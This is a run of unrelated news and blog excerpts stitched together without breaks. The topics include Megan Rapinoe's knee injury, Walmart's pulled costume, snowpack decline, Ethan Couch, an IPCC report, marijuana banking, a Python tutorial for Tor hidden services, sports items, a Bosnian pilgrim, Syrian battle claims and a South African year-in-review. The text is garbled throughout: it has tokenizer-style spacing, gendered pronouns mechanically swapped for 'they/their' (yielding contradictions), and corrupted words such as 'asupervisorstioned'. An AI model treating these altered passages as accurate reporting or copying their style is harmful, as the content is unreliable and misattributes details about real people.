“ I want to thank my teammates and the staff for the amazing support I 've received so far , ” said Rapinoe . “ I know I 'll be in the best of hands moving forward and I 'll be doing everything I can to get healthy as soon as possible . This is obviously a very difficult time , but I do feel super confident in my recovery as I 've gone through this before and I know what the process will be like . I want everyone to know that I 'll be fine , and that I 'm currently accepting any recommendations for TV shows to binge watch and great restaurants that deliver in Seattle . I 'm also going to get really good at FIFA 16 . ”
Rapinoe tore the ACL in their left knee twice in college before they embarked on their professional career that has seen their play 113 times for the USA while scoring 31 goals .
“ All of our hearts feel for Megan and she 's certainly a major part of this team , both on and off the field , so to see them go down is tough ” said U.S. head coach Jill Ellis . “ Players getting injured is always hard , but all of their teammates know that one of the strengths of this team is depth and everyone in the player pool is prepared to step up as we continue to prepare for Olympic qualifying . Megan has a great support system and she 's very resilient , so we know they will be back as soon as possible . ''
Already this fall , several retailers have pulled Halloween decorations and costumes from their shelves and online stores because they were too dangerous , too creepy , or could be used to further a rash of suspicious incidents involving people dressed as clowns . Now , Walmart is joining those ranks : the retailer is removing what it calls an inappropriate “ suicide scar ” costume makeup kit .
WABC in New York reports that Walmart pulled the “ Razor Blade Suicide Scar Wound Latex Costume Makeup ” kit from its website after it drew the ire of health advocates and customers who called the costume insensitive to mental illness and glorifying self-harm .
The retailer says that the product , which was sold for $ 3.99 online , was offered by a third-party company and was not actually from the retailer .
“ This costume is appalling and it was unacceptable for a third-party seller to list it on our marketplace . It clearly violated our prohibited items policy and we removed it when it was brought to our attention , ” the company said in a statement .
Before Walmart pulled the kit , customers shared their outrage over the inappropriate costume on social media and through a petition on Change.org .
“ Strong enough words do not exist to describe how horribly wrong this is , ” one person posted on the petition , which has since been taken down .
“ I am a psychiatric nurse practitioner and know how damaging exposure to this could be . This shows an absolute lack of sensitivity and empathy for people affected by mental illness . I am absolutely appalled , ” another petition signer said .
Hi Walmart , I would like to know which part of this is a suitable costume for anyone . Self harm is n't a `` scary costume '' for all to wear 🙂 pic.twitter.com/BLRpSXGY0J — t i f f ( @ tiffxxc ) October 24 , 2016
Shame on you Walmart for promotion a costume that endorses suicide : https : //t.co/9NZOrW15Ta Suicide is devastating ! # MentalIllness pic.twitter.com/8cPsbl35SQ — Migdalia Rivera ( @ Migdalia_Rivera ) October 22 , 2016
Hey @ Walmart what 's the deal ? Think it 's funny to joke about self harming ? How dare you . pic.twitter.com/0gcaNH1j05 — Jessica Shaw ( @ JessiBooShaw ) October 25 , 2016
https : //twitter.com/C_Hissy21/status/790387883689414656
@ Walmart a suicide Halloween makeup kit , seriously ? Mental health is not a joke to sell for a quick buck . WILL NEVER SHOP HERE AGAIN — AT ( @ yoki0100 ) October 25 , 2016
WALMART PULLS ‘ SUICIDE SCAR ' HALLOWEEN COSTUME FROM WEBSITE AFTER COMPLAINTS [ WABC ]
The American West has already lost between 10 and 20 percent of its mountain snowpack since the early 1980s , and climate change is partly to blame , new research shows . If greenhouse gas emissions are not curtailed , the region could lose 30 percent of the snowpack it relies on for irrigation and drinking water—and potentially as much as 60 percent—over the next 30 years , the authors write .
The loss ca n't be explained by natural climate variations alone , however it is consistent with model simulations that include both natural and human-caused changes , the study says .
`` These results add to the evidence of a human influence on climate that will have severe impacts on our water supply , '' said Benjamin Santer , a Lawrence Livermore National Laboratory climate scientist and a co-author of the paper , published last week in Nature Communications .
Less snowpack is more than just a blow to the skiing and snowboarding industries . The snow that falls in winter , and melts slowly during spring and summer , fills regional reservoirs and is used for irrigation , hydropower and drinking water . The Western snowpack , spread across thousands of miles of high-elevation terrain , holds far more water than all the reservoirs in the region combined .
`` A 60 percent loss would be a huge concern to farmers , ranchers and water managers , '' said lead author John Fyfe , a senior research scientist with Environment Canada , who did some of the earliest studies on global warming impacts to western water supplies .
The findings are based on data collected between 1982 and 2016 from 354 snow measuring stations across 11 states , from the Cascades of Washington and Oregon through California 's Sierra Nevada and the Rocky Mountains in Idaho , Wyoming , Montana , Colorado and New Mexico . The stations measure the amount of water in the snow , a critical metric for calculating downstream water supplies .
The maximum amount of water in the snowpack declined at 307 ( 87 percent ) of the sites between 1982 and 2016 at a rate of about 9.5 percent per decade . Projecting ahead , the models show a range of potential losses over the next 30 years reaching as high as 60 percent under a high-emissions scenario but likely closer to 30 percent , the authors write .
Fyfe said the models their team used to project the snowpack decline are similar to those used for attributing the human-made global warming to single climate events like heatwaves or droughts . The models reproduce many possible climate outcomes from a single starting point in 1950 . Running the models with and without the effects of greenhouse gas forcing factored in enables the scientists to separate the effects of natural cycles like El Niño from the effects of heat-trapping gases .
Douglas Kenney , director of the Western Water Policy Project at the University of Colorado , Boulder , said the projections reinforce the need for immediate actions to avert water shortages in the West , including massive conservation efforts , more efficient agricultural irrigation and rethinking how water from the region 's major rivers is allocated .
Many of the existing water laws and policies were set in a wetter era . Laws governing allocation of Colorado River water , for example , were established in the 1920s , an exceptionally wet period in the West , and policymakers overestimated the river 's annual flows . Kenny said the Colorado River Basin has been challenged to keep up with streamflow declines that have already happened . A speedup of the snowpack decline will hasten the day when heretofore `` unthinkable reform '' is inevitable , they said .
`` We are already a couple decades into this pattern of declining snowpacks . This is neither an abstract nor new threat , '' they said . `` There is going to be some pain and suffering . That 's a given . The question is how much of that suffering can we avoid by being proactive and innovative before the real damages set in ? ''
Keith Musselman , a water and climate science expert with the National Center for Atmospheric Research , said the study is an important step toward understanding how global warming will affect the West , as well as the global water cycle .
However , they noted that global climate models , which look at landscapes in big chunks , may underestimate how local conditions affect precipitation and snowpack . That means the new study may not capture enough nuance to accurately project local changes . The large-scale view used by global climate models also tends to be biased toward the lower elevations , which for now are more affected by global warming , they said . By comparison , they said , the high peaks hold more water than areas lower down , and the new study may overestimate the impacts to those higher reaches .
`` Affluenza teen '' Ethan Couch reportedly could not contain themselves from wildly spending while on the run from police , a recent report revealed . Couch allegedly spent over $ 2,000 ( £1,359 ) on prostitutes and alcohol at a Mexican club frequented by the infamous El Chapo .
According to The Daily Mail , the 18-year-old was `` staggering drunk '' and had to be escorted to their hotel room by strip club workers . Couch 's mother was woken up in order to pay the club 's employees for their son 's wild night out . The teen runaway had allegedly maxed out their debit card as they partied in the private room at the Puerto Vallarta strip club , Harem with two women .
`` He had drunk a lot , '' a manager of the rival Prestige strip club said . Couch had stopped in at the club earlier in the night and `` could hardly walk . '' The manager added : `` I saw their debit card receipt from Harem , it was nearly 30,000 pesos ( £1,179 ) , and the line on their debit card was all zeros . ''
The teen – who was given a 10 year probation for killing four people after their defence team successfully convinced a judge they suffered from `` affluenza '' – and their 48-year-old mother , Tonya Couch fled their Fort Worth , Texas home in December after a video emerged showing their son violating their probation . The pair drove to Mexico with their dog and landed in Puerto Vallarta on 19 December .
During a five day stay at Los Tules , a beachside resort , Couch dyed their signature blond hair black and spent a night out on the town . They reportedly began the night at Prestige , where they spent 500 pesos and had one beer , before heading to Harem . Club manager Eduardo Dudinez claimed that no one remembers seeing Couch .
`` But then , we asked the top management what we should say if we were asked by the press and they told us we should not say anything , '' Dudinez said . `` So if I did know anything I would n't tell you ! '' They added : `` We get all types of people here , from senators to El Chapo Guzman . ''
Couch and their mother were soon captured by Mexican police , and while their mother has already been returned to the US , the teen continues to fight the deportation process . Their attorney Fernando Benitez told ABC News that it could be months before the teen is deported .
While they wait in Mexico , Couch is being held at a facility where they share a room with three to four other people , officials revealed . Couch receives three meals a day and has access to a television , public telephones , an outside courtyard and unlimited access to medical care .
Tonya Couch is expected to appear in court on 5 January in Los Angeles . They were charged by the District Attorney for Texas Tarrant County for hindering apprehension of a felony and was set on a $ 1m bail .
Climate Panel : More Extreme Weather On The Way
toggle caption Vallery Hache/AFP/Getty Images
Brace yourself for more extreme weather . A group of more than 200 scientists convened by the United Nations says in a new report that climate change will bring more heat waves , more intense rainfall and more expensive natural disasters .
These conclusions are from the latest effort of the Intergovernmental Panel on Climate Change — a consensus statement from researchers around the world .
And since this is a consensus , the conclusions are carefully couched . Take , for example , the issue of rainfall . `` It is likely that the frequency of heavy precipitation will increase in the 21st century over many regions , '' says the report , which defines `` likely '' as more than a 66 percent chance .
You might expect heavy rainfall would lead to flooding , but the report is reluctant to make that strong a link . One of the authors , David Easterling from the National Climatic Data Center in Asheville , N.C. , says dams and flood-control projects in some places can handle the heavier bursts of rain , so it 's not automatically the case that downpours lead to flooding .
Another example of this deliberate , cautious approach is evident in the report 's conclusions about hurricanes and typhoons ( hurricanes ' equivalent in the Western Pacific ) . The science suggests strongly that hurricanes will eventually become more powerful , `` but we wo n't really be able to detect an increase for another 30 to 40 years , '' Easterling tells NPR . `` It may be there , but the increases are not huge . It 's not like you 'll see a doubling of wind speeds , but [ storms are ] expected to become more intense . ''
That said , the report finds no compelling evidence that hurricanes and typhoons will become more frequent as a result of climate change .
Much clearer is the trend about who is vulnerable to disaster . The report finds that 95 percent of the lives lost to natural disasters are in the developing world , where people often lack the infrastructure and resources to cope with calamity . Most of the financial costs are borne by the developed world , where valuable property is in harm 's way . And that 's not simply because of natural disasters — it 's principally because of the deliberate choices we 've made to develop along vulnerable coastlines and floodplains .
You do n't have to look far for evidence of those costs . This year `` has been one of the most costly from extreme weather events , with more billion-dollar events than ever before , '' says Mindy Lubber , president of Ceres , a nonprofit that helps businesses and investors adapt to climate change . `` The drought and wildfires in the Southwest and Southern Plains , for example , cost more than $ 9 billion in direct damage to cattle , agriculture and infrastructure . '' And Hurricane Irene , which killed at least 45 people , cost an additiional $ 7 billion .
`` Perhaps these multibillion-dollar events that are coming at us fast and furious will be enough to get policymakers to sit up and listen and realize we 've got to change — and we have to move quickly , '' Lubber says .
And perhaps a report that trips over itself to be extra cautious — as the IPCC 's tangled jargon frequently does — will also garner more credibility for the statements it does make with confidence .
A Republican U.S. senator is launching a partisan attack against efforts by Sen. Elizabeth Warren ( D-MA ) to let marijuana businesses access banks .
Sen. John Cornyn ( R-TX ) took to Twitter Monday night to share an article about a push from Warren and other senators to encourage federal regulators to loosen restrictions on banks that want to provide financial services to the cannabis industry , and they could n't resist slinging a little partisan mud .
“ No wonders Ds are losing , ” they tweeted , referring to Democrats .
Them priorities ? Sen. Elizabeth Warren wants to pull pot shops out of banking limbo https : //t.co/l63hRPJBUP — JohnCornyn ( @ JohnCornyn ) January 3 , 2017
No wonders Ds are losing https : //t.co/ESlFU1FP6k — JohnCornyn ( @ JohnCornyn ) January 3 , 2017
There are a few problems with Cornyn 's line of thinking .
First , another Republican senator also signed the same marijuana banking letter that Warren and other lawmakers sent to federal banking regulators last month .
In addition to adding their name to the note about financial services for cannabis businesses , Sen. Lisa Murkowski ( R-AK ) has separately taken a leadership role in the push to allow people who use marijuana legally in accordance with state policies to purchase guns , something that 's currently against federal law . To date , Cornyn has n't weighed in on that issue .
The other problem is that polling now consistently shows that legalizing marijuana earns far more voter support than either Republicans or Democrats in Congress do . Thus , the notion that Warren 's work on banking access for cannabis businesses is the reason that Hillary Clinton lost the White House or that their party failed to take control of the House or Senate in the most recent election does n't seem to comport with political reality .
A top aide to Republican Sen. Rand Paul ( KY ) pointed out as much , tweeting to Cornyn that Democrats are n't losing elections because of marijuana but that the “ GOP might if more do n't get into [ the ] 21st century . ”
@ JohnCornyn Dems are n't losing on this issue . But GOP might if more do n't get into 21st century . — Doug Stafford ( @ dougstafford ) January 3 , 2017
Medical marijuana patient and former talk show host Montel Williams even chimed in , calling themselves “ hardly a Warren fan ” and offering to help educate Cornyn on cannabis policy .
John : I 'll be happy to come meet you anytime , any place to explain to you just how important this is… And I 'm hardly a Warren fan… https : //t.co/gstwAbJm1C — Montel Williams ( @ Montel_Williams ) January 3 , 2017
Marijuana business leaders and legalization advocates have long pointed out that current federal rules discouraging banks from working with the cannabis industry create public safety harms by forcing them to do business in cash , which makes them a target for robberies .
In their December letter to the Financial Crimes Enforcement Network ( FinCEN ) , Warren , Murkowski and eight other senators ask the federal government to issue new guidance making it clear that marijuana providers and other businesses that serve the cannabis industry should be able to access financial services .
“ Forcing all these direct and indirect businesses to operate in cash not only creates a huge target for criminals , but also complicates the collection of state and federal taxes , ” the senators wrote . “ This business environment is an invitation to tax fraud , robberies , money laundering and organized crime . ”
In 2014 , the Obama administration released guidance intended to make it easier for banks to do business with cannabis sellers , but many financial industry leaders remain wary . They say that until federal law actually changes — as opposed to relying on nonbinding memos that could be changed by future administrations — they 're going to stay away .
There were a number of standalone bills and amendments concerning marijuana banking introduced and voted on in the just-concluded 114th Congress , but nothing made it to the president 's desk to be enacted into law . It is expected that supportive lawmakers will renew their push in the 115th Congress that begins on Tuesday .
Photo Courtesy of Allie Beckett .
Introduction
Tor is often used to protect the anonymity of someone who is trying to connect to a service . However , it is also possible to use Tor to protect the anonymity of a service provider via hidden services . These services , operating under the .onion TLD , allow publishers to anonymously create and host content viewable only by other Tor users .
The Tor project has instructions on how to create hidden services , but this can be a manual and arduous process if you want to setup multiple services . This post will show how we can use the fantastic stem Python library to automatically create and host a Tor hidden service .
Creating Hidden Services Manually
The instructions provided by the Tor project show that creating hidden services simply involves setting up the service locally ( such as a web server listening on localhost ) , and then setting a few configuration options to make the service available via Tor .
There are two configuration settings necessary to setup a hidden service : HiddenServiceDir , the directory to store the hostname and private_key files , and HiddenServicePort , the ports used to proxy hidden service connections .
As the instructions show , each hidden service requires a variation of the following two lines to be present in the torrc configuration file ( setting the directory , host , and ports appropriately ) :
HiddenServiceDir /path/to/store/hidden_service/ HiddenServicePort 80 127.0.0.1:5000
A Bit About the Tor Control Protocol
Changing the configuration file and restarting Tor everytime a change is needed can be a pain . Fortunately , Tor provides a way to dynamically change the running configuration using a simple text based protocol ( similar to Telnet ) called the Tor Control Protocol .
The full specification of the protocol is available , however here is a quick example of getting the valid authentication methods :
$ telnet localhost 9151 PROTOCOLINFO 250-PROTOCOLINFO 1 250-AUTH METHODS=COOKIE , SAFECOOKIE , HASHEDPASSWORD COOKIEFILE= '' Tor\\control_auth_cookie '' 250-VERSION Tor= '' 0.2.4.24 '' 250 OK
Other examples using this extensive protocol can be found here or in the full protocol spec .
Introducing Stem
To make interacting with the Tor control port both easier and programmatic , the Tor project maintains a fantastic Python library called Stem .
stem.Controller
Interaction with the Tor control port is performed using the stem.Controller class . Creating an instance of the class involves connecting to the port and authenticating as follows :
from stem.control import Controller controller = Controller.from_port ( address= '' 127.0.0.1 '' , port=9151 ) try : controller.authenticate ( password= '' '' ) except Exception as e : print e
Now that we have a Controller , we can access the local configuration , pull the current descriptors for relays , and more .
Let 's use the Controller to automatically set the configuration settings we saw in the previous section . When set , these configuration options will cause Tor to create the two files , hostname and private_key , necessary to run the hidden service . Here is a short script that will setup a hidden service to listen on TCP port 80 and proxy all requests to an ( already established ) web server listening on http : //127.0.0.1:5000 :
host = `` 127.0.0.1 '' port = 5000 hidden_svc_dir = `` /tmp/hidden_service/ '' controller.set_options ( [ ( `` HiddenServiceDir '' , hidden_svc_dir ) , ( `` HiddenServicePort '' , `` 80 % s : % s '' % ( host , str ( port ) ) ) ] ) svc_name = open ( hidden_svc_dir + `` /hostname '' , `` r '' ) .read ( ) .strip ( ) print `` Created host : % s '' % svc_name
Easy as that ! Now that we have the configuration setup , our service should be ready to go .
An Example Service
Now that we 've seen a little about how Stem works , here 's an extremely basic example showing how the hidden service can be setup to work with a Flask application :
from stem.control import Controller from flask import Flask if __name__ == `` __main__ '' : app = Flask ( `` example '' ) port = 5000 hosts = `` 127.0.0.1 '' hidden_svc_dir = `` c : /temp/ '' @ app.route ( '/ ' ) def index ( ) : return `` < h1 > Tor works ! < /h1 > '' print `` * Getting controller '' controller = Controller.from_port ( address= '' 127.0.0.1 '' , port=9151 ) try : controller.authenticate ( password= '' '' ) controller.set_options ( [ ( `` HiddenServiceDir '' , hidden_svc_dir ) , ( `` HiddenServicePort '' , `` 80 % s : % s '' % ( host , str ( port ) ) ) ] ) svc_name = open ( hidden_svc_dir + `` /hostname '' , `` r '' ) .read ( ) .strip ( ) print `` * Created host : % s '' % svc_name except Exception as e : print e app.run ( )
Here 's what this looks like in action :
C : \ > python tor_example.py * Getting controller * Created host : 4yrbax6gwnemqh7n.onion * Running on http : //127.0.0.1:5000/
Caveats
It is important to note that the security of the hidden service depends on protecting the location of the server . To do this , consider ways to prevent leaking the real server IP through debug messages , etc . There has been some great discussion on the topic that might be worth looking into .
Conclusion
Hidden services deliver freedom of speech and the free exchange of ideas without censorship . By using Stem Python library , it 's possible to take the pain out of manual configuration and instead programmatically create and manage multiple hidden services .
As always , let me know if you have any questions or comments .
-Jordan ( @ jw_sec )
Getty Images
Lions quarterback Matthew Stafford is playing through an injury to a finger on their throwing hand .
Stafford appeared to bang their right middle finger on the helmet of Bears passes rusher Leonard Floyd in the first quarter of today 's game in Detroit . On the sideline after the series they put gloves on and threw passes on the sideline . They appeared to look uncomfortable , but they went back into the game for the next series , wearing gloves on both hands .
This is n't the first time Stafford suffered an injury to their throwing hand . In 2011 they suffered a broken finger but played through it while wearing a glove . They struggled at times but still had a strong season .
It has n't been a good game for the first-place Lions so far , as they 're trailing the last-place Bears 3-0 in the second quarter .
The recent transfer of Juninho to Club Tijuana has left many Galaxy fans up in arms , and it 's really no surprise that the bulk of this anger is being directed at a certain English midfielder . While the realities of the transfer may never be known , the general perception among Galaxy fans is that Juninho , much like Marcelo Sarvas before him , was sacrificed by the club at the altar of Steven Gerrard .
A quick scroll through Facebook or Twitter demonstrates the average fan reaction to the Galaxy 's latest holiday move is one that involves a lot of cursing and caps lock . One fan , however , found a unique way to vent their frustration . They listed Steven Gerrard on craigslist .
While the posting itself is comic gold , describing Gerrard as `` great at meandering through grassy fields , [ and ] appearing listless on the sidelines , '' there is also much to laughed at in the finer details , such as its placement in the antiques section and the condition being listed as `` salvage . ''
While the posting is all in good fun , it does demonstrate how quickly the fans are turning on Steven Gerrard . This is nothing new for the Galaxy , of course , as David Beckham was given a similarly short leash by the fans in their first few years . The Beckham era , however , ended with the Galaxy hoisting two MLS Cups , which should serve as an important lesson to us about jumping the gun on narratives . Whether Steven Gerrard will end up being a star or a dud in this league , remains to be seen , but , for now , he 's going to have to deal with a fan base that is increasingly harboring resentment towards him .
SARAJEVO : A Bosnian Muslim pilgrim who left last December on pilgrimage to Mecca by foot told AFP on Monday that they have arrived after passing through seven countries including war-torn Syria .
“ I arrived Saturday in Mecca . I am not tired , these are the best days of my life , ” Senad Hadzic , 47 , said when reached by phone on a Saudi mobile number .
They said they had covered some 5,700 kilometres ( 3,540 miles ) in 314 days of walking through Bosnia , Serbia , Bulgaria , Turkey , Syria and Jordan to the Muslim holy city in south-western Saudi Arabia , with a backpack weighing 20 kilos ( 44 pounds ) .
They charted their progress on their Facebook page , where they posted a picture apparently of an entry-exit card for foreigners issued by the Syrian interior ministry .
“ I passed through Syria in April . I walked some 500 kilometres in 11 days . I went through Aleppo and Damascus and passed dozens of check-points held by pro-government and rebel forces alike , but I was never detained , ” Hadzic said .
“ At a check-point held by ( President Bashar ) al-Assad 's forces the soldier ordered me to empty my backpack
When I showed them my Koran and explained I was making the pilgrimage on foot , they let me go , ” they told AFP .
“ I walked in the name of Allah , for Islam , for Bosnia-Hercegovina , for my parents and my sister , ” they added .
On their Facebook page they said God had shown them the way in dreams , including to go through Syria instead of Iraq .
During the pilgrimage , Hadzic faced temperatures ranging from minus 35 Celsius ( minus 31 Fahrenheit ) in Bulgaria to plus 44 Celsius ( 111 Fahrenheit ) in Jordan .
They said they had to wait in Istanbul for several weeks to get permission to cross the Bosphorus Bridge on foot and two months at the border between Jordan and Saudi Arabia to obtain an entry visa .
The hajj is one of the five pillars of Islam and must be undertaken at least once in a lifetime by all Muslims who are able to .
Q.U.B.E . Director 's Cut moving to FREE for owners of the original game
With the recent outburst of negative comments on the price tag on the Director 's Cut version of Q.U.B.E . for owners of the original game we 're looking to make the game free for all existing players . To let you know , putting a price tag on the game for previous owners was never a scam opportunity ( we also hate those things ) but a business decision that has clearly turned out to be a mistake . We would rather have a bunch of happy fans that enjoy playing our games so thanks for letting us know that we screwed up . We 'll make sure we inform the community before we make any rash decisions in the future .
We 've contacted Valve to make the game free for existing users so it should pop up in your Steam library early next week . We 'll keep you posted .
Moments ago , the Syrian Arab Army 's 67th Brigade and their 550th Regiment of the 18th Tank Division – in coordination with National Defense Forces ( NDF ) of Homs City and Liwaa Suqour Al-Sahra ( Desert Hawks Brigade ) – announced the capture of Tal Syriatel and Jabal Ma'ar outside the city of Palmyra ( Tadmur ) after a series of intense firefights with the Islamic State of Iraq and Al-Sham ( ISIS ) in the vast desert landscape of the Homs Governorate 's eastern countryside .
According to a military source inside the provincial capital of the Homs Governorate , the Syrian Arab Army 's 67th Brigade and their allies imposed full control over Tal Syriatel and Jabal Ma'ar after overrunning ISIS ' defenses with their heavy armory , resulting in the terrorist group 's massive retreat from the asupervisorstioned hilltops that overlook Palmyra 's west district .
The military source also added that over 25 ISIS combatants were reportedly killed during these battles , including Jamal Jassim Al-Murhi , Hussein Qassem Ghareeb , Mohammad Faysal Yasseen , Mohammad Thabet Al-Shughri , Radwan Issa Abu Qa'qa ' , Wassim Yousif Khodor , ‘ Umar Qandil Al-Muslimiyah , and Mahmoud Najib Nasser .
With the capture of Al-Bayarat and their recent advances at the Ancient Palmyra Quarries , Al-Kassarat and Al-Dawa , the Syrian Armed Forces are positioning themselves for a massive assault on ISIS ' defenses inside the ancient city of Palmyra ; if captured , they will be in position to strike the strategic town of Sukaneh .
Advertisements
Breakbeat wizard Squarepusher revisits and mixes up highlights from their impressive back catalogue in a new series of podcasts .
On the second of these mixes , ‘ Endless Flamethrower ' ( premiered today through FACT ; the first , ‘ Instantium Hardphace ' was tied into last year 's Bloc ) , ‘ Pusher focuses on the mid-noughties and late-nineties , opening on a pair of tracks from Hello Everything ( 2006 ) before heading back through Ultravisitor ( 2004 ) , Go Plastic ( 2001 ) , Port Rhombus ( 1996 ) and Feed Me Weird Things ( 1996 ) .
Although Squarepusher 's made most headlines for their albums ( well , that and ‘ Red Hot Car ' ) , their discography is packed with anomalies and forgotten-by-many EPs , so we 're excited to see what they dig out on subsequent podcasts . Speaking about the series , Jenkinson describes the mixes as “ horizontal slices ” . “ The idea ” , they explain , “ is that there are several long running ‘ themes ' in my work -in other words , groups of pieces across time that partake of some kind of stylistic commonality . So whilst any given group will draw from nearly twenty years of releases , it will have an aesthetic unity that individual albums have often shunned . Of course , it 's up to the listener to make sense ( or otherwise ) of what that aesthetic may be ! ” . You can stream it below .
Squarepusher takes their UFABULUM live show to London this month , with support from The Bug and Factory Floor .
Tracklist :
“ Rotate Electrolyte ” / Hello Everything ( 2006 )
“ Planetarium ” / Hello Everything ( 2006 )
“ Ultravisitor ” / Ultravisitor ( 2004 )
“ Welcome To Europe ” / Hello Everything ( 2006 )
“ I Wish You Could Talk ” / Go Plastic ( 2001 )
“ PSultan ( Squarepusher remix ) ” / Chaos A.D. ( 1998 )
“ Port Rhombus ” / Port Rhombus e.p . ( 1996 )
“ Tetra-Sync ” / Ultravisitor ( 2004 )
“ Tommib ” / Go Plastic ( 2001 )
“ Theme From Ernest Borgnine ” / Feed Me Weird Things ( 1996 )
In a society trapped in a leaderless quagmire , where somebody probably stands for something yet nobody stands for anything , a new flame has flickered to life . Thousands of young people rose up , stood together and challenged the establishment – from their campuses , the streets , Parliament and the lawns of the majestic Union Buildings , they made their voices heard . They brought down a symbol of exploitation and privilege , exposed the prevailing racism on their campuses and fought against fee increases in higher education . When all else is being sucked into a bottomless pit , the youth of the nation raised their fists and reminded us what true leadership is . By RANJENI MUNUSAMY .
The things that fell in 2015 :
The integrity of the State of the Nation Address
Members of Parliament assaulted by security officers
Parliamentary decorum
Signal jamming
The statue of Cecil John Rhodes
The integrity of state institutions
Hopes that the Marikana Commission would provide closure and justice
South African tourism
Helen Zille as leader of the Democratic Alliance
Zwelinzima Vavi as general secretary of Cosatu
The state 's respect for the judicial system
Loadshedding
Foreign nationals killed by South Africans in xenophobic violence
The ICC arrest warrant and high court interdict against Omar al-Bashir
Fraud and tax charges against Julius Malema
University fee increases
Oscar Pistorius 's flimsy version of Reeva Steenkamp 's murder
Blade Nzimande 's # StudentsMustFall joke
The primacy of Afrikaans at Stellenbosch University
Riah Phiyega
Presidential accountability
ANC membership
Heyneke Meyer
South Africa 's credit rating
Nhlanhla Nene
The Rand
President Jacob Zuma 's last shred of credibility
The things that did not fall in 2015 :
Hlaudi Motsoeneng
Rain
President Jacob Zuma 's laugh
State capture
Operation Fiela
Dudu Myeni 's flight of fancy at South African Airways
Archbishop Emeritus Desmond Tutu 's good cheer
Unabridged birth certificates
The “ premier league ” in the ANC
Nkosinathi Nhleko 's Nkandla whitewash report
Presidential prerogative to ruin South Africa
South Africa did not have a good story to tell in 2015 . It was a year of upheavals , violence , court battles and economic hardship . President Jacob Zuma , enabled by the ANC , trampled on any smidgen of accountability and respect for the nation , and then laughed at us .
We watched in horror as South Africans killed and assaulted people from other countries living among us . Then a jackboot police and military operation rolled out , stomping on our human rights culture and hounding out foreign nationals from the country .
The people of Marikana waited and waited and waited – for justice , for closure . They still have neither . Nkandla continued to contaminate the national discourse with more nonsense about the firepool and cattle kraal , and Zuma remained dogged that they would not pay back the money .
A despot came to visit and the South African government showed the High Court of South Africa and the International Criminal Court its middle finger to facilitate their return to their country . Another National Police Commissioner bit the dust , and now faces disciplinary procedures before their inevitable dishonourable exit from the police .
To remove any element of doubt that theirs is a presidency of calamity and destruction , Zuma fired a respected Minister of Finance , Nhlanhla Nene , plunging the country into economic peril . It is the single most dangerous act by a South African leader in the democratic era . Then , in a spectacular late-night about-turn , Zuma returned Pravin Gordhan to the Finance Ministry to undo the damage .
Through all this , South Africans could only sit and watch helplessly . As the country spirals , an increasingly disenchanted citizenry channels its frustrations through armchair activism , social media rants and hashtag revolutions .
One phenomenon bucked the trend : student activism .
First through the # RhodesMustFall campaign , then # OpenStellenbosch and culminating in # FeesMustFall , students revived the spirit of civil action and activism that drove the mass action and defiance campaigns against the apartheid regime . Most of the students involved in the campaigns have no memory of apartheid or the liberation struggle – they discovered a fighting spirit within and made South Africa pay attention .
The campaign to bring down the statute of Cecil John Rhodes at the University of Cape Town helped South Africa part ways with the era of reconciliation , which preserved the vestiges of colonialism and apartheid to keep up a false sense of nationhood . The # RhodesMustFall movement and spill-over protests at other campuses and memorials demanded that the façade of a “ rainbow nation ” needed to make way for real transformation in all spheres of society .
Open Stellenbosch and the “ Luister ” documentary exposed evil of racism lurking in the heart of one of country 's most prominent education institutions . It is a contagion students are no longer willing to put up with .
It was # FeesMustFall however that really jerked South Africa out of its slumber . Student leaders from across political affiliations took up an issue that has never been high on the national agenda , even though access and affordability of education is crucial to the social and economic health of society . The protests were led by students alone , who doggedly refused that their campaign be hijacked by political parties .
As the protests against fee increases in 2016 grew in momentum , university management and council were forced out of their ivory towers and had to come to the ground – literally . Government did not have the same response . They stalled , fidgeted , came up with a shoddy compromise percentage and eventually unleashed riot police on the students .
Shocking scenes played out outside Parliament where young people were pepper-sprayed , assaulted and arrested . The students took their demands to Albert Luthuli House , the home of the ruling party , and eventually to the seat of government , the Union Buildings .
After a day of violence and turmoil , stoked by unruly elements within the student movement , the president blinked . Fee increases for 2016 were scrapped and government undertook to find funds to make up the shortfall .
Violence , destruction of property and disruption of examinations continued on some campuses , but did not take away from the victory of the student community , which they achieved through solidarity and unrelenting commitment to their cause .
# FeesMustFall incited a newfound radicalism in the youth , a flame that must be kept burning so that complacency and laziness does not add to the steady erosion of our democracy .
In a maelstrom of anger , discontent and flashes of disorganised rebellion , South Africa is country haunted by its past , held hostage by its present and uncertain of its future . We need people of good conscience , with commitment to freeing our society from the shackles of the past and with a new vision for our future to step forward .
In 2015 , South African students stood up for themselves and for a generation . We salute you , youngblood . DM
Main photo : Illustration of # FeesMustFall by FAITH47 .
__________________________________________
2015 South African Person of the Year , Runner-up : Supreme Court of Appeal
At a time when state capture and an onslaught on our democracy are realities , South Africa needs constitutional safeguards and the rule of law to prevail . It is what stands between us and criminality , a complete descent into madness , the rule of the mob and the triumph of the power barons .
Photo : Supreme Court of Appeal ( Original photo by worldtravelserver )
The Supreme Court of Appeal ( SCA ) might be one of the most intimidating institutions any person can encounter , but it works . It continues to uphold the law of the land and is one of the few bodies left that can help us tell right from wrong .
In a case pertaining to the invincible SABC chief operating officer Hlaudi Motsoeneng , the SCA reaffirmed the powers of the Public Protector , asserting that their remedial action could not be ignored . The SCA told the Minister of Basic Education in no uncertain terms that they had a responsibility to provide textbooks to the children of Limpopo in a case that should never have gone near a courtroom .
And the SCA finally kicked out Oscar Pistorius 's contradictory and absurd version of how they killed Reeva Steenkamp . Pistorius has now rightly been convicted of murder . This was a case that cast South Africa into the international spotlight and the ruling has restored faith in the criminal justice system and set important legal precedents for dolus eventualis and violence against women .
In 2016 , more crucial cases will come before the courts , including the Constitutional Court case on the Public Protector 's recommendations on the Nkandla security upgrades .
May Lady Justice have the last word . DM
Are You A South AfriCAN or a South AfriCA N'T ?
Maverick Insider is more than a reader revenue scheme . While not quite a `` state of mind '' , it is a mindset : it 's about believing that independent journalism makes a genuine difference to our country and it 's about having the will to support that endeavour .
From the # GuptaLeaks into State Capture to the Scorpio exposés into SARS , Daily Maverick investigations have made an enormous impact on South Africa and it 's political landscape . As we enter an election year , our mission to Defend Truth has never been more important . A free press is one of the essential lines of defence against election fraud ; without it , national polls can turn very nasty , very quickly as we have seen recently in the Congo .
If you would like a practical , tangible way to make a difference in South Africa consider signing up to become a Maverick Insider . You choose how much to contribute and how often ( monthly or annually ) and in exchange , you will receive a host of awesome benefits . The greatest benefit of all ( besides inner peace ) ? Making a real difference to a country that needs your support .
Ranjeni Munusamy Follow Save More
Comments
Please or create an account to view the comments . To join the conversation , sign up as a Maverick Insider .
Image caption Fergus Ewing told the rural economy committee that 90 % of payments were projected to be made by Friday
